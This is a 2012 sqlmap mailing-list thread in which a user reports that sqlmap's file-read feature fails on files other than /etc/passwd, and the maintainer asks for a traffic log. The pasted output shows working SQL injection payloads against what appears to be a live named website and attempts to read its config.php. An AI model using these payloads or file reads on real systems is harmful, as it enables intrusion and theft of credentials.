Hi Bob.
Could you please send one of those problematic retrieved files?
Also, traffic file would be nice (just append -t traffic.txt to a normal
run)
Kind regards,
Miroslav Stampar
On Jun 16, 2012 10:51 AM, "Bob" <stock.l...@qq.com> wrote:
> Hi all ,
>
> i use file-read to retrieve file on server .
>
> /etc/passwd can workable
>
> but others response is as followed .
>
> 16:44:14] [INFO] resuming back-end DBMS 'mysql 5' from session file
> [16:44:14] [INFO] testing connection to the target url
> sqlmap identified the following injection points with a total of 0 HTTP(s)
> requests:
> ---
> Place: GET
> Parameter: su_sd
> Type: boolean-based blind
> Title: AND boolean-based blind - WHERE or HAVING clause (Generic
> comment)
> Payload: Fai=&SU=&nw=&su_sd=%' AND 5207=5207-- &pe=650
>
> Type: UNION query
> Title: MySQL UNION query (NULL) - 17 columns
> Payload: Fai=&SU=&nw=&su_sd=%' LIMIT 1,1 UNION ALL SELECT NULL,
> CONCAT(0x3a7a66623a,0x5a546342474b66515343,0x3a777a663a), NULL, NULL, NULL,
> NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
> NULL#&pe=650
> ---
>
> [16:44:16] [INFO] the back-end DBMS is MySQL
> [16:44:16] [INFO] fetching banner
> web server operating system: Linux Fedora 15 (Lovelock)
> web application technology: PHP 5.3.8, Apache 2.2.17
> back-end DBMS: MySQL 5
> banner: '5.1.60'
>
> [16:44:16] [INFO] fingerprinting the back-end DBMS operating system
> [16:44:16] [INFO] the back-end DBMS operating system is Linux
> [16:44:16] [INFO] fetching file: '/var/www/config.php'
> [16:44:16] [ERROR] for some reason(s) sqlmap retrieved an odd-length
> hexadecimal string which it is not able to convert to raw string
> /var/www/config.php file saved to: '/pentest/database/sqlmap/output/
> www.kangyang.com.tw/files/_var_www_config.php'
>
> [16:44:16] [INFO] fetched data logged to text files under
> '/pentest/database/sqlmap/output/www.kangyang.com.tw'
>
> [*] shutting down at 16:44:16
>
>
>
> ------------------------------------------------------------------------------
> Live Security Virtual Conference
> Exclusive live event will cover all the ways today's security and
> threat landscape has changed and how IT managers can respond. Discussions
> will include endpoint security, mobile security and the latest in malware
> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
------------------------------------------------------------------------------
Live Security Virtual Conference
Exclusive live event will cover all the ways today's security and
threat landscape has changed and how IT managers can respond. Discussions
will include endpoint security, mobile security and the latest in malware
threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
